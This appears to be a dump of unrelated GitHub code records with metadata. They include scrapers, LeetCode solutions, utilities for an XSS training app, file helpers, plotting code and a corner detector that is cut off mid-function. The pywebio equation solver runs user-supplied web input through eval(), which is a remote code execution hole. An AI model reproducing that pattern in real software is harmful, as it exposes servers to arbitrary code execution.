continue\")\n\nworkbook = xlsxwriter.Workbook(workbookName)\nprint(\"Restaurant info loading...\")\nrestaurantNames = []\nfor url in urlList:\n # TODO: uuughhhhh\n print(\"Now scraping at URL: \" + url)\n\n browser = webdriver.Firefox(executable_path='/Users/hazelfoerstner/Desktop/Edibly/menustuff/geckodriver')\n page = browser.get(url)\n\n restaurantName = \\\n wait(browser, 10).until(lambda browser: browser.find_element_by_xpath(\"//meta[@itemprop='brand']\")).get_attribute(\n \"content\").split(\"(\")[0]\n soup_level1 = BeautifulSoup(browser.page_source, 'lxml')\n soup = soup_level1.find_all('div')\n\n try:\n worksheetName = restaurantName[0:26].strip()\n worksheet = workbook.add_worksheet(worksheetName + '.xlsx')\n restaurantNames.append(restaurantName.strip())\n except:\n x = random.randint(1, 99)\n x = str(x)\n worksheetName = restaurantName[0:23] + x + '.xlsx'\n worksheet = workbook.add_worksheet(worksheetName + x + '.xlsx')\n\n # formatting\n bold = workbook.add_format({'bold': True})\n wrapItUp = workbook.add_format()\n wrapItUp.set_text_wrap()\n worksheet.set_column('A:A', 20)\n worksheet.set_column('B:C', 50)\n worksheet.set_column('F:G', 50)\n worksheet.set_column('G:H', 150)\n\n veganColor = workbook.add_format()\n veganColor.set_bg_color('lime')\n veggieColor = workbook.add_format()\n veggieColor.set_bg_color('yellow')\n\n # gluten = glutenCatcher(soup)\n # if gluten:\n # worksheet.write(3, 7, gluten, wrapItUp)\n\n # No gluten for skip, I don't feel like figuring this out\n\n divs = []\n dishTypes = []\n\n for div in soup:\n titles = div.findAll('h6')\n if titles != [] and titles[0].text not in dishTypes:\n dishTypes.append(titles[0].text)\n divs.append(div)\n divs.pop(0)\n dishTypes.pop(0)\n row = 3\n col = 0\n\n n = 1\n categoryIs = 0\n\n for dishCategory in divs:\n dishType = dishTypes[categoryIs]\n categoryIs += 1\n dishNames = getNames(dishCategory)\n dishDescriptions = getDescriptions(dishCategory)\n\n # write type of dish, i.e. antipasti\n worksheet.write(row, col, dishType, wrapItUp)\n\n # this guy gets rid of any extra titles in the beginning, like \"Pizza is fresh made in-house\".\n while len(dishDescriptions) > len(dishNames):\n dishDescriptions.pop(0)\n while len(dishNames) > len(dishDescriptions):\n dishNames.pop(0)\n\n # this writes the dishes and dish descriptions in\n for dish in dishNames:\n worksheet.write(row, col + 1, dish, wrapItUp)\n n = dishNames.index(dish)\n # only some dishes have descriptions.\n try:\n dishDescription = dishDescriptions[n]\n except:\n dishDescription = \"No description given.\"\n\n # Priority for regex:\n # non-veg names < non-veg descriptions < veg names < veg descriptions\n vegan = veganCatcher(dishDescription)\n meat = meatCatcher(dishDescription)\n plant = plantCatcher(dishDescription)\n if vegan == None:\n vegan = veganCatcher(dish)\n if meat == None:\n meat = meatCatcher(dish)\n if plant == None:\n plant = plantCatcher(dish)\n if not plant:\n worksheet.write(row, 4, meat)\n worksheet.write(row, 3, meat)\n worksheet.write(row, 3, vegan)\n worksheet.write(row, col + 2, dishDescription, wrapItUp)\n else:\n worksheet.write(row, 4, plant, veganColor)\n worksheet.write(row, 3, plant, veganColor)\n worksheet.write(row, col + 2, dishDescription, wrapItUp)\n worksheet.set_row(row, None, veganColor)\n\n if not meat:\n if not vegan:\n worksheet.set_row(row, None, veganColor)\n else:\n worksheet.set_row(row, None, veggieColor)\n row += 1\n\n # Write some data headers.\n worksheet.write('A1', restaurantName, bold)\n worksheet.write('B1', \"Url: \" + url, bold)\n worksheet.write('A2', 'Category', bold)\n worksheet.write('B2', 'Name', bold)\n worksheet.write('C2', \"Description\", bold)\n worksheet.write('D2', \"Vegan\", bold)\n worksheet.write('E2', \"Veggie\", bold)\n worksheet.write('F2', \"Type\", bold)\n worksheet.write('G2', \"Restaurant Info\", bold);\n worksheet.write('H2', \"Gluten info\", bold);\n address = getAddress(soup)\n worksheet.write('G3', address);\n worksheet.write('G4', \"Edmonton, AB\");\n worksheet.write('G5', \"Image URL\");\n worksheet.write('G6', \"Restaurant tip here\");\n worksheet.write('G7', \"Manager or owner info here (name, phone number, email)\");\n\n print(\"Excel sheet written to new sheet: \" + worksheetName + \"!\")\n\nworkbook.close()\ndishcategorizer.run(workbookName)\nprint(\"Closing workbook \" + workbookName)\ninput(\"Enter any key to finish running\")","repo_name":"hazelf42/menu-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":10743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"11376907216","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution(object):\n def isPalindrome(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: bool\n \"\"\"\n l = []\n while head:\n l.append(head.val)\n head = head.next\n \n print(l)\n\n for i in range(0, len(l)-1):\n if l[i] != l[len(l)-1-i]:\n return False\n return True\n\n ","repo_name":"Miti29/Leetcode","sub_path":"0234-palindrome-linked-list/0234-palindrome-linked-list.py","file_name":"0234-palindrome-linked-list.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"4596014516","text":"from website.models import ReflectedXssModule, DomBasedXssModule, StoredXssModule\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import get_object_or_404\nfrom django.http import Http404\n\n# function to update challenge completition progress\n# challenge_progress_number is progress in binary 1=first challenge, 11=second challenge, 111, third challenge etc.\ndef update_user_progress(request, challenge_progress_number):\n\n list = request.path.split('/')\n\n module_name = list[-2]\n\n user = User.objects.get(id=request.user.id)\n module = get_module_or_none(module_name, user)\n \n # update module progress in binary 1=first challenge, 11=second challenge, 111, third challenge etc.\n int_challenge_progress_number = int(challenge_progress_number,2)\n if module.challenge_completition < int_challenge_progress_number:\n module.challenge_completition = int_challenge_progress_number\n module.save() \n\n\n# get correct module object by module_name, returns None if object does not exsist\ndef get_module_or_none(module_name, user):\n if module_name == 'reflected_xss':\n return ReflectedXssModule.objects.filter(user=user).first()\n elif module_name == 'dom_based_xss':\n return DomBasedXssModule.objects.filter(user=user).first()\n elif module_name == 'stored_xss':\n return StoredXssModule.objects.filter(user=user).first()\n else:\n raise Exception(f'We have no module named {module_name}')\n\n# check if challenge has been completed, returns boolean\ndef challenge_completed(request, required_completition_number):\n list = request.path.split('/')\n module_name = list[-2]\n\n user = get_object_or_404(User, id=request.user.id)\n try:\n module = get_module_or_none(module_name, user)\n except:\n raise Http404\n int_required_completition_number = int(required_completition_number,2)\n if module.challenge_completition >= int_required_completition_number:\n return True\n else:\n return False\n\n# returns true if there is a need to display rules to user(if any module is started return false)\n\ndef read_rules(user):\n if ReflectedXssModule.objects.filter(user = user).exists() or DomBasedXssModule.objects.filter(user = user).exists() or StoredXssModule.objects.filter(user = user).exists():\n return False\n else:\n return True","repo_name":"PDastych/XSS_APP","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10620796756","text":"import requests\nimport re\n\ndef director_scrap(pageid):\n # Make the request\n r = requests.get(f'https://en.wikipedia.org/w/api.php?action=query&prop=revisions&rvprop=content&pageids={pageid}&format=json') \n\n # Convert the response to JSON\n data = r.json()\n\n # Check if page is missing\n if 'missing' in data['query']['pages'][str(pageid)]:\n return None\n\n # Check if revisions key exists\n if 'revisions' not in data['query']['pages'][str(pageid)]:\n return None\n\n # Extract the wikitext content of the page\n wikitext = data['query']['pages'][str(pageid)]['revisions'][0]['*']\n\n # Use a regular expression to extract the director's name\n pattern = r'\\|\\s*director\\s*=\\s*(?:(?:{{(?:ubl|Plainlist)\\|)?\\[\\[)?([^\\]|<\\n\\[{]+)'\n match = re.search(pattern, wikitext)\n\n if match:\n director = match.group(1).split('|')[-1].strip()\n\n # Clean up the name to remove any content within parentheses\n director = re.sub(r'\\s*\\([^)]+\\)', '', director)\n\n if not director: # Check if the extracted director name is empty\n return None\n\n return director\n else:\n return None\n","repo_name":"epfl-ada/ada-2023-project-patterndetectives","sub_path":"code/director_scrap.py","file_name":"director_scrap.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"9271767137","text":"nome = 'Eduardo Bueno da Silva'\naltura = 1.71\npeso = 90\nimc = peso / (altura * altura)\n\n''' f-strings '''\nlinha_1 = f'{nome}, tem, {altura} de altura,'\nlinha_2 = f'pesa, {peso} quilos e seu IMC é {imc:.2f}'\n\nprint(linha_1)\nprint(linha_2)","repo_name":"ebssolucoescorporativas/Curso_Python","sub_path":"aula12.py","file_name":"aula12.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"18354761910","text":"import numpy as np\nfrom scipy import signal\nimport pandas as pd\nimport pyedflib as el\nfrom datetime import datetime, timedelta\nfrom matplotlib import pyplot as pp\nimport seaborn as sns\npp.rcParams['figure.figsize'] = (16.0, 8.0)\n\ndef plot_signal_fragment(\n csv_sig, edf_sig, seconds=10, shift=0,\n csv_title='NeuroOn signal',\n edf_title='Aura PSG signal'\n):\n '''\n Simple function used to plot two signals, based on their timestamps.\n '''\n plotting_series = [\n [211, csv_title, csv_sig],\n [212, edf_title, edf_sig]\n ]\n for series in plotting_series:\n pp.subplot(series[0])\n pp.title(series[1])\n signal = series[2]\n time_slice = np.logical_and(\n signal['timestamp'] >= signal['timestamp'][0] + timedelta(seconds=shift),\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=shift + seconds)\n )\n x_axis = signal['timestamp'][time_slice]\n y_axis = signal['signal'][time_slice]\n pp.plot(x_axis, y_axis)\n return pp.show()\n\ndef plot_spectrum_fragment(\n csv_sig, edf_sig, seconds=10, shift=0,\n cap_frequency=False,\n csv_title='NeuroOn spectrum',\n edf_title='Aura PSG spectrum'\n):\n '''\n Simple function used to plot spectrum of two signals, based on their timestamps.\n '''\n plotting_series = [\n [211, csv_title, csv_sig],\n [212, edf_title, edf_sig]\n ]\n for series in plotting_series:\n pp.subplot(series[0])\n pp.title(series[1])\n signal = series[2]\n signal_freq = len(signal[\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=1)\n ])\n time_slice = np.logical_and(\n signal['timestamp'] >= signal['timestamp'][0] + timedelta(seconds=shift),\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=shift + seconds)\n )\n signal_len = len(signal[time_slice])\n signal_y = signal[time_slice]['signal']\n spectrum_y = np.fft.fft(signal_y) / signal_len\n spectrum_x = np.arange(signal_len) / (signal_len / signal_freq)\n half_spectrum = int(signal_len / 2)\n x_axis = spectrum_x[:half_spectrum]\n y_axis = abs(spectrum_y[:half_spectrum])\n if (cap_frequency):\n pp.xlim(0, cap_frequency)\n pp.plot(x_axis, y_axis)\n pp.show()\n\n\ndef plot_spectrum_fragment(\n csv_sig, edf_sig,\n seconds=10,\n shift=0,\n initial_timestamp=False,\n cap_frequency=False,\n csv_title='NeuroOn signal',\n csv_label='NeuroOn spectrum',\n edf_title='Aura PSG signal',\n edf_label='Aura PSG spectrum'\n):\n '''\n Plot two signals on separate subplots and their spectrum on a third one.\n Based on timestamps.\n '''\n plotting_series = [\n {\n 'subplot': 221,\n 'title': csv_title,\n 'label': csv_label,\n 'signal': csv_sig,\n 'color': sns.xkcd_rgb['denim blue']\n },\n {\n 'subplot': 222,\n 'title': edf_title,\n 'label': edf_label,\n 'signal': edf_sig,\n 'color': sns.xkcd_rgb['medium green']\n }\n ]\n if not initial_timestamp:\n csv_init_ts = csv_sig.timestamp[0]\n edf_init_ts = edf_sig.timestamp[0]\n initial_timestamp = csv_init_ts if csv_init_ts > edf_init_ts else edf_init_ts\n for series in plotting_series:\n pp.subplot(series['subplot'])\n pp.title(series['title'])\n signal = series['signal']\n color = series['color']\n signal_freq = len(signal[\n signal['timestamp'] < signal['timestamp'][0] + timedelta(seconds=1)\n ])\n time_slice = np.logical_and(\n signal['timestamp'] >= initial_timestamp + timedelta(seconds=shift),\n signal['timestamp'] < initial_timestamp + timedelta(seconds=shift + seconds)\n )\n signal_len = len(signal[time_slice])\n signal_y = signal[time_slice]['signal']\n signal_x = signal[time_slice]['timestamp']\n pp.plot(signal_x, signal_y, color)\n pp.subplot(212)\n spectrum_y = np.fft.fft(signal_y) / signal_len\n spectrum_x = np.arange(signal_len) / (signal_len / signal_freq)\n half_spectrum = int(signal_len / 2)\n x_axis = spectrum_x[:half_spectrum]\n y_axis = abs(spectrum_y[:half_spectrum])\n if (cap_frequency):\n pp.xlim(0, cap_frequency)\n pp.plot(x_axis, y_axis, color, label=series['label'])\n pp.legend()\n pp.show()\n","repo_name":"pawelngei/neuroon-notebook","sub_path":"lib/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"30315986716","text":"\"\"\"\nThis module contains file- and path-related methods, classes, and modules.\n\"\"\"\n\n__docformat__ = \"markdown\"\n\n# ---------------------------------------------------------------------------\n# Imports\n# ---------------------------------------------------------------------------\n\nimport os as _os\nimport shutil\nfrom typing import (Sequence, Mapping, Any, Optional, Union, NoReturn,\n Generator, Tuple)\n\n# ---------------------------------------------------------------------------\n# Exports\n# ---------------------------------------------------------------------------\n\n__all__ = ['unlink_quietly', 'recursively_remove', 'copy', 'touch',\n 'pathsplit', 'eglob', 'universal_path', 'native_path',\n 'list_recursively', 'includer']\n\n# ---------------------------------------------------------------------------\n# Functions\n# ---------------------------------------------------------------------------\n\ndef unlink_quietly(*paths: Union[str, Sequence[str]]) -> NoReturn:\n \"\"\"\n Like the standard `os.unlink()` function, this function attempts to\n delete a file. However, it swallows any exceptions that occur during the\n unlink operation, making it more suitable for certain uses (e.g.,\n in `atexit` handlers).\n\n **Parameters**\n\n - `paths` (`str` or sequence of `str`): path(s) to unlink\n \"\"\"\n def looper(*paths):\n for i in paths:\n if type(i) == list:\n for path in i:\n yield path\n else:\n yield i\n\n for path in looper(*paths):\n try:\n _os.unlink(path)\n except:\n pass\n\ndef recursively_remove(dir: str) -> NoReturn:\n \"\"\"\n Recursively remove all files and directories below and including a\n specified directory.\n\n **Parameters**\n\n - `dir` (`str`): path to directory to remove\n \"\"\"\n if not _os.path.exists(dir):\n return\n\n shutil.rmtree(dir)\n\n\ndef list_recursively(dir: str, *,\n include_files: bool = True,\n include_dirs: bool = True) -> Generator[None, str, None]:\n \"\"\"\n Recursively list the contents of a directory. Yields the contents of\n the directory and all subdirectories. This method returns a generator,\n so it evaluates its recursive walk lazily. This function is just a\n simple wrapper around `os.walk`.\n\n Each yielded value is a partial path, relative to the original directory.\n\n **Parameters**\n\n - `dir` (`str`): Path to directory to list\n - `include_files` (`bool`): Whether or not to yield directories. `True`\n by default.\n - `include_dirs` (`bool`): Whether or not to yield files. `True` by\n default.\n\n **Yields**\n\n partial paths of all directories and/or files below the specified directory\n\n **Raises**\n\n `ValueError`: If `dir` does not exist, or if `dir` exists but is not a\n directory.\n \"\"\"\n if not _os.path.isdir(dir):\n raise ValueError(\"{0} is not a directory.\".format(dir))\n\n from grizzled.os import working_directory\n\n with working_directory(dir):\n for dirpath, dirnames, filenames in _os.walk('.'):\n if include_dirs:\n for d in dirnames:\n yield _os.path.normpath(_os.path.join(dirpath, d))\n if include_files:\n for f in filenames:\n yield _os.path.normpath(_os.path.join(dirpath, f))\n\n\ndef copy(files : Union[Sequence[str], str],\n target_dir : str,\n create_target : bool = False) -> None:\n \"\"\"\n Copy one or more files to a target directory.\n\n **Parameters**\n\n - `files` (`str` or `list` of `str`): a string representing a single path,\n or a list of strings representing multiple paths, to be copied\n - `target_dir` (`str`): path to the target directory\n - `create_target` (`bool`): whether or not to create the target\n\n **Returns** Nothing\n\n **Raises**\n\n - `OSError`: `target_dir` does not exist and `create_target` is `False`.\n \"\"\"\n if type(files) == str:\n files = [files]\n\n if not _os.path.exists(target_dir):\n if create_target:\n _os.mkdir(target_dir)\n\n if _os.path.exists(target_dir) and (not _os.path.isdir(target_dir)):\n raise OSError(\n\t 'Cannot copy files to non-directory \"{0}\"'.format(target_dir)\n\t)\n\n for f in files:\n targetFile = _os.path.join(target_dir, _os.path.basename(f))\n open(targetFile, 'wb').write(open(f, 'rb').read())\n\ndef touch(files: Union[str, Sequence[str]], *,\n times: Optional[Tuple[int, int]] = None,\n ns: Optional[Tuple[int, int]] = None) -> NoReturn:\n \"\"\"\n Similar to the Unix *touch* command, this function:\n\n - updates the access and modification times for any existing files\n in a list of files\n - creates any non-existent files in the list of files\n\n `files` can be a single string or a sequence of strings.\n\n If any file in the list is a directory, this function will throw an\n exception.\n\n - If `ns` is not `None`, it must be a 2-tuple of the form\n `(atime_ns, mtime_ns)` where each member is an `int` expressing\n nanoseconds.\n - If `times` is not `None`, it must be a 2-tuple of the form\n `(atime, mtime)` where each member is an `int` or `float` expressing\n seconds.\n - If `times` is `None` and `ns` is `None`, this is equivalent to\n specifying `ns=(atime_ns, mtime_ns)` where both times are the current\n time.\n - If both are specified, `ValueError` is raised.\n \"\"\"\n if type(files) == str:\n files = [files]\n\n if (times is not None) and (ns is not None):\n raise ValueError(\"Can't specify both ns and times.\")\n\n for f in files:\n if _os.path.exists(f):\n if not _os.path.isfile(f):\n raise OSError('Cannot touch non-file \"{0}\"'.format(f))\n if ns:\n _os.utime(f, times=None, ns=ns)\n else:\n _os.utime(f, times)\n\n else:\n # Doesn't exist. Create it.\n open(f, 'wb').close()\n\n\ndef pathsplit(path: str) -> Sequence[str]:\n \"\"\"\n Split a path into an array of path components, using the file separator\n (e.g., '/' on POSIX systems) that's appropriate for the underlying operating\n system. Does not take drive letters into account. If there's a Windows\n drive letter in the path, it'll end up with the first component.\n\n **Parameters**\n\n - `path` (`str`): path to split. Can be relative or absolute\n\n **Returns**\n\n a list of path components\n \"\"\"\n result = []\n (head, tail) = _os.path.split(path)\n\n if (not head) or (head == path):\n # No file separator. Done.\n pass\n\n else:\n result = pathsplit(head)\n\n if tail:\n result += [tail]\n\n return result\n\ndef _find_matches(pattern_pieces: Sequence[str],\n directory: str) -> Generator[str, str, None]:\n \"\"\"\n Used by eglob.\n \"\"\"\n import glob\n\n if not _os.path.isdir(directory):\n return\n\n piece = pattern_pieces[0]\n last = len(pattern_pieces) == 1\n remaining_pieces = []\n if piece == '**':\n if not last:\n remaining_pieces = pattern_pieces[1:]\n\n for root, dirs, files in _os.walk(directory):\n if last:\n # At the end of a pattern, \"**\" just recursively matches\n # directories.\n yield _os.path.normpath(root)\n else:\n # Recurse downward, trying to match the rest of the\n # pattern.\n sub_result = _find_matches(remaining_pieces, root)\n for partial_path in sub_result:\n yield _os.path.normpath(partial_path)\n\n else:\n # Regular glob pattern.\n\n matches = glob.glob(_os.path.join(directory, piece))\n if len(matches) > 0:\n if last:\n for match in matches:\n yield _os.path.normpath(match)\n else:\n remaining_pieces = pattern_pieces[1:]\n for match in matches:\n sub_result = _find_matches(remaining_pieces, match)\n for partial_path in sub_result:\n yield _os.path.normpath(partial_path)\n\ndef eglob(pattern: str, directory: str = '.') -> Generator[str, str, None]:\n \"\"\"\n Extended glob function that supports the all the wildcards supported\n by the Python standard `glob` routine, as well as a special `**`\n wildcard that recursively matches any directory.\n\n **Parameters**\n\n - `pattern` (`str`): The wildcard pattern.\n - `directory` (`str`): The directory in which to do the globbing. Defaults\n to `.`\n\n **Yields**\n\n The matched paths.\n \"\"\"\n pieces = pathsplit(pattern)\n return _find_matches(pieces, directory)\n\ndef universal_path(path: str) -> str:\n \"\"\"\n Converts a path name from its operating system-specific format to a\n universal path notation. Universal path notation always uses a Unix-style\n \"/\" to separate path elements. A universal path can be converted to a\n native (operating system-specific) path via the `native_path()`\n function. Note that on POSIX-compliant systems, this function simply\n returns the `path` parameter unmodified.\n\n **Parameters**\n\n - `path` (`str`): the path to convert to universal path notation\n\n **Returns**\n\n The path in universal path notation.\n \"\"\"\n if _os.name != 'posix':\n path = path.replace(_os.path.sep, '/')\n\n return path\n\ndef native_path(path: str) -> str:\n \"\"\"\n Converts a path name from universal path notation to the operating\n system-specific format. Universal path notation always uses a Unix-style\n \"/\" to separate path elements. A native path can be converted to a\n universal path via the `universal_path()` function. Note that on\n POSIX-compliant systems, this function simply returns the `path`\n parameter unmodified.\n\n **Parameters**\n\n - `path` (`str`): the universal path to convert to native path notation\n\n **Returns**\n\n The path in native path notation.\n \"\"\"\n if _os.name != 'posix':\n path = path.replace('/', _os.path.sep)\n\n return path\n","repo_name":"bmc/grizzled-python","sub_path":"grizzled/file/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10230,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"6"} +{"seq_id":"6497559332","text":"from pywebio import start_server\nfrom pywebio.input import *\nfrom pywebio.output import *\n\ndef solve_r(Equation) :\n r = Equation.replace(\" \",\"\").lower()\n try :\n if 'x^3' in r :\n \n if not '=' in r :\n r += '=0'\n a = list(r.split(\"x^3\"))[0]\n b = r.replace(str(a)+\"x^3\"+\"+\",\"\").replace(str(a)+\"x^3\",\"\").split(\"x^2\")[0]\n c = r.replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\"+\"+\",\"\").replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\",\"\").split(\"x\")[0].replace(\"+\",\"\")\n d = r.replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\"+str(\"+\"+str(c) if float(c) > 0 else str(c))+\"x\"+\"+\",\"\").replace(str(a)+\"x^3\"+str(\"+\"+str(b) if float(b) > 0 else str(b))+\"x^2\"+str(\"+\"+str(c) if float(c) > 0 else str(c))+\"x\",\"\").split(\"=\")[0].replace(\"+\",\"\")\n e = r.split(\"=\")[1]\n a = float(a)\n b = float(b)\n c = float(c)\n d = float(d)\n e = float(e)\n\n if d == 0 and e == 0 :\n Solve_Cubic_Equation_var_1 = b\n Solve_Cubic_Equation_var_2 = (b * b - 4 * a * c) ** 0.5\n Solve_Cubic_Equation_var_3 = 2 * a\n return 'x = ' + str(-Solve_Cubic_Equation_var_1 + Solve_Cubic_Equation_var_2) / (Solve_Cubic_Equation_var_3)\n else :\n Solve_Cubic_Equation_xess = [x*0.001 for x in range(2*-100000, 2*100000+1)]\n\n for l in Solve_Cubic_Equation_xess :\n if ((a*l ** 3) + (b*l**2) + (c * l) + (d) == e) :\n return 'x = ' + str(l)\n break\n else :\n continue \n\n elif 'x^2' in r :\n if not '=' in r :\n r += '=0'\n\n a = list(r.split(\"x^2\"))[0]\n b = r.replace(str(a)+\"x^2+\",\"\").replace(str(a)+\"x^2\",\"\")\n b = b.split(\"x\")[0]\n var2 = \"+\"+str(b) if float(b) > 0 else str(b)\n c = r.replace(str(a)+\"x^2\"+str(var2)+\"x\"+\"+\",\"\").replace(str(a)+\"x^2\"+str(var2)+\"x\",\"\")\n c = c.split(\"=\")[0].replace(\"+\",\"\")\n d = r.split(\"=\")[1]\n\n a = float(a)\n b = float(b)\n c = float(c)\n d = float(d)\n\n\n Solve_Quadratic_Equation_var_0 = c + (-d)\n Solve_Quadratic_Equation_var_1 = -b\n Solve_Quadratic_Equation_var_2 = (b * b - 4 * a * Solve_Quadratic_Equation_var_0) ** 0.5\n Solve_Quadratic_Equation_var_3 = 2 * a\n return 'x = ' + str((Solve_Quadratic_Equation_var_1 + Solve_Quadratic_Equation_var_2) / (Solve_Quadratic_Equation_var_3))\n\n elif 'x' in r :\n a = r.split('x')[0]\n b = r.replace(str(a)+'x','').split('=')[0]\n c = r.split('=')[1]\n a = float(a)\n b = float(b)\n c = float(c)\n \n var1 = c + (-b)\n return 'x = ' + str(var1/a)\n else :\n return eval(Equation.replace('^','**'))\n except :\n return 'Error'\n \n\nput_html('

zezn Equation

')\neq = input_group('Enter an Equation to Solve it !'\n ,[\n input(name='Eq')\n ]\n)\n\nput_text('Result : ' + str(solve_r(eq['Eq'])))\ninput()\n","repo_name":"Zezn-Corportion/Test","sub_path":"WEB.py","file_name":"WEB.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39586124907","text":"import os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nfrom predictfunc import Parameter,load_model,predictJava\nimport sys\nimport getopt\nimport time\n\ndef main(datavalg,img_path):\n\n \"\"\"\n datavalg = sys.argv[1]\n\n img_path = sys.argv[2]\n \"\"\"\n\n # print(datavalg)\n # print(img_path)\n p=Parameter(32,180,180)\n train_ds = None\n val_ds = None \n data_dir= None \n #read_data(datavalg)\n #train_ds = training_data(p) \n #val_ds = valid_data(p)\n #model = load_model(datavalg)\n datavalg = int (datavalg)\n if(datavalg == 1): \n text = predictJava(p,model1,datavalg,img_path)\n elif(datavalg == 2):\n text = predictJava(p,model2,datavalg,img_path)\n \n \n \n return text\n \n #sourceFile = open('C:/Users/krist/Code/IdeaProjects/FindFirkanter/src/com/company/demo.txt','w')\n #print(text,file = sourceFile)\n #sourceFile.close()\n\n\n\nmodel1 = load_model(1)\nmodel2 = load_model(2) \ns = sys.stdin.readline().strip()\nwhile s not in ['quit']:\n val = s.split(',') \n text = main(val[0],val[1])\n sys.stdout.write(text+'\\n')\n sys.stdout.flush()\n s = sys.stdin.readline().strip()\n \n","repo_name":"s172133/backend_cdio","sub_path":"testing/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27813081712","text":"\"\"\"\nModule dependencies percentage.\n\nTo-do:\n\"\"\"\nimport re\nimport sys\n\n\nRE_FROM = re.compile(\"from (.*) import (.*)\")\nRE_IMPT = re.compile(\"import (.*)\")\n\n\ndef main(filename):\n \"\"\"Main.\"\"\"\n sourcese = \"\"\n try:\n with open(filename, 'r') as source_file:\n sourcese = source_file.read().splitlines()\n except IOError:\n print(\"Not found file.\")\n exit()\n\n list_from = []\n list_impt = []\n for source in sourcese:\n res_from = RE_FROM.findall(source)\n res_impt = RE_IMPT.findall(source)\n if res_from:\n list_from.append(res_from)\n elif res_impt:\n list_impt.append(res_impt)\n else:\n continue\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n exit()\n main(sys.argv[1])\n","repo_name":"Hikai/Language","sub_path":"Python/module_dependency.py","file_name":"module_dependency.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"21666566214","text":"#https://leetcode.com/problems/perfect-squares/\n\nfrom collections import deque\nimport math\n\nclass Solution:\n #BFS solution. Faster solutions likely exist that use approaches other than BFS, may need to revisit this problem.\n def numSquares(self, n: int) -> int:\n\n #Helper method to get the list of neighbors for a given node\n def getNeighbors(sum: int) -> list[int]:\n neighbors = []\n maxRange = int(math.sqrt(n)) #We will limit the perfect squares to be subtracted depending on n for efficiency\n for i in range(1, maxRange + 1):\n neighbors.append(sum - (i * i)) #Subtract a perfect square from the current node to find its neighbors\n return neighbors\n\n #Visualize this as a graph where the root node is n, and we want to reach node 0\n #For a given node, its neighbors are nodes that can be reached by subtracting a perfect square\n #Use BFS to find the shortest route from node n to node 0\n #We enqueue a list consisting of the current node, and the length of the path it took to reach this node from the root\n queue = deque()\n queue.append([n, 0]) #[Current node, number of perfect squares involved in the sum (i.e. length of path to reach this node)]\n visited = set()\n visited.add(n) #We have visited node n\n while queue: #Just a standard BFS traversal\n currNode = queue.popleft()\n if currNode[0] == 0: #If we have found node 0...\n return currNode[1] #We've already computed the length of the path it took to reach this node\n neighbors = getNeighbors(currNode[0]) #Get all the neighbors of currNode\n for neighbor in neighbors:\n if neighbor not in visited:\n queue.append([neighbor, currNode[1] + 1]) #We have enqueued a neighbor, the length of the path increases by one\n visited.add(neighbor)\n \n return 0 #This should be reached since the problem statement assures us that a sum of perfect squares exists for n\n\n\ndef main():\n solution = Solution()\n print(solution.numSquares(12))\n \n \n\nif __name__ == \"__main__\": #Entry point\n main() #Calling main method","repo_name":"Adam-1776/Practice","sub_path":"DSA/perfectSquares/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31114502574","text":"import sys\nimport numpy as np\nimport pylab\nimport scipy.ndimage.filters as ndi\nimport skimage.io\nimport skimage.transform\nimport cv2\nfrom random import shuffle\nfrom operator import itemgetter\n\n\n\ndef gaussian1D(n, sigma=3.0):\n result = np.zeros(n)\n mid = int(n / 2)\n result = [(1 / (np.sqrt(2 * np.pi * sigma**2)) * (np.e**(-((i**2) / (2 * sigma**2))))) for i in\n range(-mid, mid + 1)]\n\n return result\n\n#helper function\ndef remove_eig(list_tuples):\n new_list = []\n for i in range(len(list_tuples)):\n x,y,e = list_tuples[i]\n new_list.append([x, y])\n return new_list\n\n\ndef find_corners(image, dx, dy, thresh, output, m=4):\n\n x2 = dx ** 2\n xy = dx*dy\n y2 = dy ** 2\n\n offset = 2*m+1\n\n corners = []\n percentCorners = .1 #percentage of corners to actually draw\n\n print (\"Looking for corners...\")\n for y in range(offset, image.shape[0]-offset):\n for x in range(offset, image.shape[1]-offset):\n\n Fx2 = x2[y - offset:y + offset, x - offset:x + offset]\n Fxy = xy[y - offset:y + offset, x - offset:x + offset]\n Fy2 = y2[y - offset:y + offset, x - offset:x + offset]\n\n 